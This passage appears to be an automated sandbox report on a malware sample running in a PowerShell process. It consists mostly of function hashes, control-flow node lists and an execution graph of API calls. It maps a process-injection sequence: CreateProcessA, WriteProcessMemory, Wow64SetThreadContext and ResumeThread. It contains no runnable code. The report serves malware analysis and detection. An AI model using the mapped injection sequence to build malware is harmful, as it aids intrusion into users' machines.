                                                        • Opcode Fuzzy Hash: e173e10e35b7a6bbc19d9d68077556d0be52e5aec6c1189041583ea6bf995657
                                                        • Instruction Fuzzy Hash: E441D630B01204DFDB14DE59D674BEAB7EAAF88720F99C0A9D4059B354CB71DD40CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 009B2C26 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 631 9b2c26-9b2c28 632 9b2c29 631->632 633 9b2c9f-9b2ca1 631->633 634 9b2c2a-9b2c2b 632->634 635 9b2c2d-9b2c31 632->635 636 9b2cb2 633->636 638 9b2c39-9b2c47 634->638 639 9b2c1b-9b2c21 635->639 640 9b2c32-9b2c38 635->640 637 9b2cb7-9b2cc4 636->637 643 9b2cca-9b2d21 637->643 645 9b2c4d-9b2c51 638->645 646 9b2d24-9b2d2e 638->646 639->638 641 9b2c23 639->641 640->638 641->631 645->646 647 9b2c57-9b2c5b 645->647 649 9b2d3c-9b2d42 646->649 650 9b2d30-9b2d39 646->650 647->646 651 9b2c61-9b2c87 647->651 652 9b2d48-9b2d54 649->652 653 9b2d44-9b2d46 649->653 651->646 660 9b2c8d-9b2c91 651->660 654 9b2d56-9b2d79 652->654 653->654 661 9b2c93-9b2c9c 660->661 662 9b2cb4 660->662 663 9b2c9e 661->663 664 9b2ca3-9b2cb0 661->664 662->637 663->633 664->636
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446269476.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_9b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $&,$$&,$(op$(op
                                                        • API String ID: 0-760950474
                                                        • Opcode ID: d6f046c49d7efae441daa3bc1ccde922950716d35a7d28e8a24730aaf453e728
                                                        • Instruction ID: 00481f3c32ccea609b1ee45b95af9b22208b811a6eca255f671ca95d88a77e9f
                                                        • Opcode Fuzzy Hash: d6f046c49d7efae441daa3bc1ccde922950716d35a7d28e8a24730aaf453e728
                                                        • Instruction Fuzzy Hash: 20312A317002099FCF158F68C915BEEBB92EB85331F2488AAE9518B2D4CB75C851CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 009B106F Relevance: 5.0, Strings: 4, Instructions: 44COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 667 9b106f-9b10d0 674 9b10e8-9b10ec 667->674 675 9b10d2-9b10d8 667->675 678 9b10f3-9b10f5 674->678 676 9b10da 675->676 677 9b10dc-9b10de 675->677 676->674 677->674 679 9b110d-9b1164 678->679 680 9b10f7-9b10fd 678->680 681 9b10ff 680->681 682 9b1101-9b1103 680->682 681->679 682->679
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446269476.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_9b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'p$D<4$D<4$$p
                                                        • API String ID: 0-584163927
                                                        • Opcode ID: 11afa5e776c78cd1d2569d845e18e9ac55543383c02a10427021061325fa8da9
                                                        • Instruction ID: 1f4cbfdbdf324644de8940a74fa800560300db08189744f4a12451f09d6716ca
                                                        • Opcode Fuzzy Hash: 11afa5e776c78cd1d2569d845e18e9ac55543383c02a10427021061325fa8da9
                                                        • Instruction Fuzzy Hash: 2A014E34B04100EBDF15A358D5206BEB752DB88B10F70802AD905EB161CB36DD46DB55
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 009B270F Relevance: 2.5, Strings: 2, Instructions: 23COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 827 9b270f-9b2727 829 9b272e-9b2730 827->829 830 9b2748-9b279f 829->830 831 9b2732-9b2738 829->831 832 9b273a 831->832 833 9b273c-9b273e 831->833 832->830 833->830
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446269476.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_9b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'p$4'p
                                                        • API String ID: 0-3973980265
                                                        • Opcode ID: d9fcb3739453ba7c982858bb43d9bc57698b6095fd2591d339b14ac2979fe9b5
                                                        • Instruction ID: 147ca6d9bb2ee562412c9187020c7ca0d1abc97c11567b93b59d531aff4da27a
                                                        • Opcode Fuzzy Hash: d9fcb3739453ba7c982858bb43d9bc57698b6095fd2591d339b14ac2979fe9b5
                                                        • Instruction Fuzzy Hash: 88E0D8317043449ACB19676495613EC7BA1EFD2270F6484DFC48086255CE249D16C352
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00277290 Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 835 277290-277329 837 277372-27739a 835->837 838 27732b-277342 835->838 841 2773e0-277436 837->841 842 27739c-2773b0 837->842 838->837 843 277344-277349 838->843 851 27747c-277573 CreateProcessA 841->851 852 277438-27744c 841->852 842->841 853 2773b2-2773b7 842->853 844 27736c-27736f 843->844 845 27734b-277355 843->845 844->837 846 277357 845->846 847 277359-277368 845->847 846->847 847->847 850 27736a 847->850 850->844 871 277575-27757b 851->871 872 27757c-277661 851->872 852->851 860 27744e-277453 852->860 854 2773da-2773dd 853->854 855 2773b9-2773c3 853->855 854->841 857 2773c7-2773d6 855->857 858 2773c5 855->858 857->857 861 2773d8 857->861 858->857 863 277476-277479 860->863 864 277455-27745f 860->864 861->854 863->851 865 277463-277472 864->865 866 277461 864->866 865->865 868 277474 865->868 866->865 868->863 871->872 884 277663-277667 872->884 885 277671-277675 872->885 884->885 889 277669 884->889 887 277677-27767b 885->887 888 277685-277689 885->888 887->888 890 27767d 887->890 891 27768b-27768f 888->891 892 277699-27769d 888->892 889->885 890->888 891->892 893 277691 891->893 894 2776d3-2776de 892->894 895 27769f-2776c8 892->895 893->892 899 2776df 894->899 895->894 899->899
                                                        APIs
                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00277557
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446125326.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_270000_powershell.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 0d1c437ff977cbbaead58acc08b3b7d6270a0923563f5ce2906c9dc0abde3bc7
                                                        • Instruction ID: 203920d3f2e079256ce9b20aea641487554e6bcaa88eeef3044465ecae04ab66
                                                        • Opcode Fuzzy Hash: 0d1c437ff977cbbaead58acc08b3b7d6270a0923563f5ce2906c9dc0abde3bc7
                                                        • Instruction Fuzzy Hash: EFC12870D1421A8FDF24CFA8C841BEDBBB1BF49300F0091AAD859B7254DB749A95CF95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00276EF8 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1053 276ef8-276f63 1055 276f65-276f77 1053->1055 1056 276f7a-276fe1 WriteProcessMemory 1053->1056 1055->1056 1058 276fe3-276fe9 1056->1058 1059 276fea-27703c 1056->1059 1058->1059
                                                        APIs
                                                        • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 00276FCB
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446125326.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_270000_powershell.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 2beecc33fd9cda78239a92cf22acbcabf0e0d357865c8b68c794bfb30982417b
                                                        • Instruction ID: c9b0cbdba03aa84f6e9a0868dd58461c5ab94c3aabdd11bb86dee6c710f8d698
                                                        • Opcode Fuzzy Hash: 2beecc33fd9cda78239a92cf22acbcabf0e0d357865c8b68c794bfb30982417b
                                                        • Instruction Fuzzy Hash: 6241CAB4D012499FCF00CFA9D984AEEFBF1BB49314F20942AE819B7250C334AA55CF64
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00276C99 Relevance: 1.6, APIs: 1, Instructions: 98threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1064 276c99-276d00 1066 276d17-276d65 Wow64SetThreadContext 1064->1066 1067 276d02-276d14 1064->1067 1069 276d67-276d6d 1066->1069 1070 276d6e-276dba 1066->1070 1067->1066 1069->1070
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 00276D4F
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446125326.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_270000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 5c252ba6133d1e29c3c9fc0df4405e555abe4807205246990c8d6c0e69aafd5e
                                                        • Instruction ID: 6dc63295042e8e02d3a1f743c1036cf02ff94e9ad9e72e41655da585a012e878
                                                        • Opcode Fuzzy Hash: 5c252ba6133d1e29c3c9fc0df4405e555abe4807205246990c8d6c0e69aafd5e
                                                        • Instruction Fuzzy Hash: 7841DEB4D102589FCF10CFA9D984AEEFBB1AF48314F24802AE419B7250D738A949CF54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00276CA0 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1075 276ca0-276d00 1077 276d17-276d65 Wow64SetThreadContext 1075->1077 1078 276d02-276d14 1075->1078 1080 276d67-276d6d 1077->1080 1081 276d6e-276dba 1077->1081 1078->1077 1080->1081
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 00276D4F
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446125326.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_270000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: daa66d4574c3eb44ecf61add671006a460b5dc0c9be693171bbf29e0196ed0ff
                                                        • Instruction ID: 1e25531edef40b0022b681dffde968232b6cff79411e77776dcffdefaf1f7d8e
                                                        • Opcode Fuzzy Hash: daa66d4574c3eb44ecf61add671006a460b5dc0c9be693171bbf29e0196ed0ff
                                                        • Instruction Fuzzy Hash: D741CBB4D102589FCF10CFA9D984AEEFBF1AF49314F24802AE418B7240D779A989CF54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00276BB0 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1086 276bb0-276c44 ResumeThread 1089 276c46-276c4c 1086->1089 1090 276c4d-276c8f 1086->1090 1089->1090
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446125326.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_270000_powershell.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: b2b1a6aea10b90dcfd8ab5b991137c7d8302543fe9cc52417ed2e74a35070904
                                                        • Instruction ID: defb630be2cdc387579a9ceda20af158e7a2eee9690b1cd86c981813bc3f80b4
                                                        • Opcode Fuzzy Hash: b2b1a6aea10b90dcfd8ab5b991137c7d8302543fe9cc52417ed2e74a35070904
                                                        • Instruction Fuzzy Hash: 9731DAB4D102089FCF10CFAAD984AAEFBB1EF49314F14842AE819B7300C735A905CF94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0019D01D Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446090575.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_19d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c03947c8b0ffc6a316d543a3d1bfc8d5afa22d914785123ed10549046e28e1fd
                                                        • Instruction ID: e93c1d0f2b750453490b071bbf88b58c90dcbdad35bbbcb66de5e9a429030e5a
                                                        • Opcode Fuzzy Hash: c03947c8b0ffc6a316d543a3d1bfc8d5afa22d914785123ed10549046e28e1fd
                                                        • Instruction Fuzzy Hash: F501A771504340AAEB104E15DC84B67BFD8EF41724F2CC51AFC494F286C779D845C6B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0019D01C Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446090575.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_19d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1f1e3f072dd828ff2c8223d59318f9d372bed5e238574c6a10e67afd0e6575c4
                                                        • Instruction ID: 9a1081d619fc9d864fe99cf4e308816908f33a9ef1c4d8832f0f85b2e2f5dc50
                                                        • Opcode Fuzzy Hash: 1f1e3f072dd828ff2c8223d59318f9d372bed5e238574c6a10e67afd0e6575c4
                                                        • Instruction Fuzzy Hash: 55F04F71404244AEEB108A16DC84B66FB98EB81724F18C55AED484E296C3799C45CAB2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 009B00A0 Relevance: 16.7, Strings: 13, Instructions: 417COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446269476.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_9b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ''$(:4$(:4$(:4$L4p$L4p$L4p$L4p$L4p$L4p$L:4$L:4$L:4
                                                        • API String ID: 0-3936058094
                                                        • Opcode ID: 0aa67a62442be8b5118d50332831f8d58c3e2bd75041d5e93e8db624dce0a6bb
                                                        • Instruction ID: 052592e0e23b2f623649e383e62424bdb40e8ab6e430b0941422574ff8060bb8
                                                        • Opcode Fuzzy Hash: 0aa67a62442be8b5118d50332831f8d58c3e2bd75041d5e93e8db624dce0a6bb
                                                        • Instruction Fuzzy Hash: 84E16634B00244EFDB258F28CA54BEF7BA6AFC4320F188466E9559B291DB70CD45CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 009B1F38 Relevance: 6.4, Strings: 5, Instructions: 184COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446269476.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_9b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: h%i$h%i$$p$$p$$p
                                                        • API String ID: 0-475278312
                                                        • Opcode ID: 7949bebc07f96cbb9fb576de528cc7fe4199a2c99f2094f74bb230d4153372fe
                                                        • Instruction ID: 9260235cc6bfd07571e8d3c272e3a18562d97bb3a20dba595012004b998d0066
                                                        • Opcode Fuzzy Hash: 7949bebc07f96cbb9fb576de528cc7fe4199a2c99f2094f74bb230d4153372fe
                                                        • Instruction Fuzzy Hash: E85122317042019BCB24AB6D89507BBFBEAEFC5320F68887AD945DB251DB71DC41C7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 009B2DBA Relevance: 6.4, Strings: 5, Instructions: 166COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446269476.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_9b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: L4p$L4p$L4p$d.,$d.,
                                                        • API String ID: 0-1661813829
                                                        • Opcode ID: baedd46745f780427e4b43287e1fdc2f7c137fdfcde23ee0e192c04e0e266d95
                                                        • Instruction ID: a172e66398ec3c5587c3d6cc4353d2d9368a2679f1a997abc495914ea21cc1e1
                                                        • Opcode Fuzzy Hash: baedd46745f780427e4b43287e1fdc2f7c137fdfcde23ee0e192c04e0e266d95
                                                        • Instruction Fuzzy Hash: E7513535700244EBCF159F28C954BFE7BA6EF84320F148426E9158F291CBB4DD41DB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 009B02E4 Relevance: 6.4, Strings: 5, Instructions: 118COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446269476.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_9b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: L4p$L4p$L4p$L:4$L:4
                                                        • API String ID: 0-1544877867
                                                        • Opcode ID: 0b72b5542c5695b04405cd3353a1973594c0694603dd65a15115cf1a3f0f422f
                                                        • Instruction ID: 272fe92f2c189176ec453a931a7ce1624dea9eb93eee056e298e9ee10dff6ef4
                                                        • Opcode Fuzzy Hash: 0b72b5542c5695b04405cd3353a1973594c0694603dd65a15115cf1a3f0f422f
                                                        • Instruction Fuzzy Hash: D741F234A01248EFDB248E64C6447FF7BABAFC4320F188065E9059B2A1E7B4DD85CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 009B07C0 Relevance: 5.2, Strings: 4, Instructions: 209COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446269476.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_9b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $;4$L4p$L4p$L4p
                                                        • API String ID: 0-3081791480
                                                        • Opcode ID: b0d8124febaacc5e9d36a2fafc7fa02040bc048cc7660dc8da22955973b607e6
                                                        • Instruction ID: 22f47bba80ea163c16ba57fc3cff13d4d01c552e3871e792312c0258721ed8c1
                                                        • Opcode Fuzzy Hash: b0d8124febaacc5e9d36a2fafc7fa02040bc048cc7660dc8da22955973b607e6
                                                        • Instruction Fuzzy Hash: 1E611534B00204EFEB159E68C9547FF7FA6AFC4320F148466E9059B292DB71DE45CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 009B071A Relevance: 5.0, Strings: 4, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.446269476.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_9b0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'p$4'p$$p$$p
                                                        • API String ID: 0-377911355
                                                        • Opcode ID: e521cba35607d2c76f4d54dcafbbebe3a1452aa5a1285dfd4f5a0e5598e66c7b
                                                        • Instruction ID: a75116d85ba8a67972c9eb39771a48c4d494721817c2c285db240e97a3ea3dca
                                                        • Opcode Fuzzy Hash: e521cba35607d2c76f4d54dcafbbebe3a1452aa5a1285dfd4f5a0e5598e66c7b
                                                        • Instruction Fuzzy Hash: 5501D6257093C01FD32A02381C616EAEFA65FC2760B6D81EBD081CF257CD589C47C792
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:4.9%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:4%
                                                        Total number of Nodes:1636
                                                        Total number of Limit Nodes:56
                                                        execution_graph 47242 445847 47243 445852 47242->47243 47245 44587b 47243->47245 47247 445877 47243->47247 47248 448a84 47243->47248 47255 44589f DeleteCriticalSection 47245->47255 47256 4484ca 47248->47256 47251 448ac9 InitializeCriticalSectionAndSpinCount 47254 448ab4 47251->47254 47253 448ae0 47253->47243 47263 434fcb 47254->47263 47255->47247 47257 4484f6 47256->47257 47258 4484fa 47256->47258 47257->47258 47262 44851a 47257->47262 47270 448566 47257->47270 47258->47251 47258->47254 47260 448526 GetProcAddress 47261 448536 __crt_fast_encode_pointer 47260->47261 47261->47258 47262->47258 47262->47260 47264 434fd6 IsProcessorFeaturePresent 47263->47264 47265 434fd4 47263->47265 47267 435018 47264->47267 47265->47253 47277 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47267->47277 47269 4350fb 47269->47253 47271 448587 LoadLibraryExW 47270->47271 47272 44857c 47270->47272 47273 4485a4 GetLastError 47271->47273 47274 4485bc 47271->47274 47272->47257 47273->47274 47276 4485af LoadLibraryExW 47273->47276 47274->47272 47275 4485d3 FreeLibrary 47274->47275 47275->47272 47276->47274 47277->47269 47278 434887 47279 434893 ___scrt_is_nonwritable_in_current_image 47278->47279 47305 434596 47279->47305 47281 43489a 47283 4348c3 47281->47283 47611 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 47281->47611 47290 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47283->47290 47316 444251 47283->47316 47287 4348e2 ___scrt_is_nonwritable_in_current_image 47288 434962 47324 434b14 47288->47324 47290->47288 47612 4433e7 36 API calls 5 library calls 47290->47612 47298 434984 47299 43498e 47298->47299 47614 44341f 28 API calls _Atexit 47298->47614 47301 434997 47299->47301 47615 4433c2 28 API calls _Atexit 47299->47615 47616 43470d 13 API calls 2 library calls 47301->47616 47304 43499f 47304->47287 47306 43459f 47305->47306 47617 434c52 IsProcessorFeaturePresent 47306->47617 47308 4345ab 47618 438f31 47308->47618 47310 4345b0 47315 4345b4 47310->47315 47627 4440bf 47310->47627 47313 4345cb 47313->47281 47315->47281 47317 444268 47316->47317 47318 434fcb __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 47317->47318 47319 4348dc 47318->47319 47319->47287 47320 4441f5 47319->47320 47323 444224 47320->47323 47321 434fcb __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 47322 44424d 47321->47322 47322->47290 47323->47321 47677 436e90 47324->47677 47327 434968 47328 4441a2 47327->47328 47679 44f059 47328->47679 47330 434971 47333 40e9c5 47330->47333 47331 4441ab 47331->47330 47683 446815 36 API calls 47331->47683 47854 41cb50 LoadLibraryA GetProcAddress 47333->47854 47335 40e9e1 GetModuleFileNameW 47859 40f3c3 47335->47859 47337 40e9fd 47874 4020f6 47337->47874 47340 4020f6 28 API calls 47341 40ea1b 47340->47341 47880 41be1b 47341->47880 47345 40ea2d 47906 401e8d 47345->47906 47347 40ea36 47348 40ea93 47347->47348 47349 40ea49 47347->47349 47912 401e65 47348->47912 48181 40fbb3 118 API calls 47349->48181 47352 40eaa3 47356 401e65 22 API calls 47352->47356 47353 40ea5b 47354 401e65 22 API calls 47353->47354 47355 40ea67 47354->47355 48182 410f37 36 API calls __EH_prolog 47355->48182 47357 40eac2 47356->47357 47917 40531e 47357->47917 47360 40ea79 48183 40fb64 78 API calls 47360->48183 47361 40ead1 47922 406383 47361->47922 47365 40ea82 48184 40f3b0 71 API calls 47365->48184 47371 401fd8 11 API calls 47373 40eefb 47371->47373 47372 401fd8 11 API calls 47374 40eafb 47372->47374 47613 4432f6 GetModuleHandleW 47373->47613 47375 401e65 22 API calls 47374->47375 47376 40eb04 47375->47376 47939 401fc0 47376->47939 47378 40eb0f 47379 401e65 22 API calls 47378->47379 47380 40eb28 47379->47380 47381 401e65 22 API calls 47380->47381 47382 40eb43 47381->47382 47383 40ebae 47382->47383 48185 406c1e 47382->48185 47384 401e65 22 API calls 47383->47384 47390 40ebbb 47384->47390 47386 40eb70 47387 401fe2 28 API calls 47386->47387 47388 40eb7c 47387->47388 47391 401fd8 11 API calls 47388->47391 47389 40ec02 47943 40d069 47389->47943 47390->47389 47396 413549 3 API calls 47390->47396 47393 40eb85 47391->47393 48190 413549 RegOpenKeyExA 47393->48190 47394 40ec08 47395 40ea8b 47394->47395 47946 41b2c3 47394->47946 47395->47371 47402 40ebe6 47396->47402 47400 40f34f 48273 4139a9 30 API calls 47400->48273 47401 40ec23 47403 40ec76 47401->47403 47963 407716 47401->47963 47402->47389 48193 4139a9 30 API calls 47402->48193 47406 401e65 22 API calls 47403->47406 47408 40ec7f 47406->47408 47417 40ec90 47408->47417 47418 40ec8b 47408->47418 47410 40f365 48274 412475 65 API calls ___scrt_get_show_window_mode 47410->48274 47411 40ec42 48194 407738 30 API calls 47411->48194 47412 40ec4c 47415 401e65 22 API calls 47412->47415 47427 40ec55 47415->47427 47416 40f36f 47420 41bc5e 28 API calls 47416->47420 47423 401e65 22 API calls 47417->47423 48197 407755 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 47418->48197 47419 40ec47 48195 407260 98 API calls 47419->48195 47424 40f37f 47420->47424 47425 40ec99 47423->47425 48073 413a23 RegOpenKeyExW 47424->48073 47967 41bc5e 47425->47967 47427->47403 47431 40ec71 47427->47431 47428 40eca4 47971 401f13 47428->47971 48196 407260 98 API calls 47431->48196 47435 401f09 11 API calls 47437 40f39c 47435->47437 47438 401f09 11 API calls 47437->47438 47440 40f3a5 47438->47440 48076 40dd42 47440->48076 47441 401e65 22 API calls 47443 40ecc1 47441->47443 47446 401e65 22 API calls 47443->47446 47448 40ecdb 47446->47448 47447 40f3af 47449 401e65 22 API calls 47448->47449 47450 40ecf5 47449->47450 47451 401e65 22 API calls 47450->47451 47452 40ed0e 47451->47452 47454 401e65 22 API calls 47452->47454 47484 40ed7b 47452->47484 47453 40ed8a 47455 40ed93 47453->47455 47483 40ee0f ___scrt_get_show_window_mode 47453->47483 47458 40ed23 _wcslen 47454->47458 47456 401e65 22 API calls 47455->47456 47457 40ed9c 47456->47457 47459 401e65 22 API calls 47457->47459 47461 401e65 22 API calls 47458->47461 47458->47484 47462 40edae 47459->47462 47460 40ef06 ___scrt_get_show_window_mode 48258 4136f8 RegOpenKeyExA 47460->48258 47464 40ed3e 47461->47464 47465 401e65 22 API calls 47462->47465 47468 401e65 22 API calls 47464->47468 47466 40edc0 47465->47466 47470 401e65 22 API calls 47466->47470 47467 40ef51 47471 401e65 22 API calls 47467->47471 47469 40ed53 47468->47469 48198 40da34 47469->48198 47472 40ede9 47470->47472 47473 40ef76 47471->47473 47478 401e65 22 API calls 47472->47478 47993 402093 47473->47993 47476 401f13 28 API calls 47477 40ed72 47476->47477 47480 401f09 11 API calls 47477->47480 47481 40edfa 47478->47481 47480->47484 48256 40cdf9 45 API calls _wcslen 47481->48256 47482 40ef88 47999 41376f RegCreateKeyA 47482->47999 47983 413947 47483->47983 47484->47453 47484->47460 47489 40eea3 ctype 47493 401e65 22 API calls 47489->47493 47490 40ee0a 47490->47483 47491 401e65 22 API calls 47492 40efaa 47491->47492 48005 43baac 47492->48005 47494 40eeba 47493->47494 47494->47467 47498 40eece 47494->47498 47497 40efc1 48261 41cd9b 87 API calls ___scrt_get_show_window_mode 47497->48261 47500 401e65 22 API calls 47498->47500 47499 40efe4 47505 402093 28 API calls 47499->47505 47502 40eed7 47500->47502 47503 41bc5e 28 API calls 47502->47503 47507 40eee3 47503->47507 47504 40efc8 CreateThread 47504->47499 49224 41d45d 10 API calls 47504->49224 47506 40eff9 47505->47506 47508 402093 28 API calls 47506->47508 48257 40f474 104 API calls 47507->48257 47510 40f008 47508->47510 48009 41b4ef 47510->48009 47511 40eee8 47511->47467 47513 40eeef 47511->47513 47513->47395 47515 401e65 22 API calls 47516 40f019 47515->47516 47517 401e65 22 API calls 47516->47517 47518 40f02b 47517->47518 47519 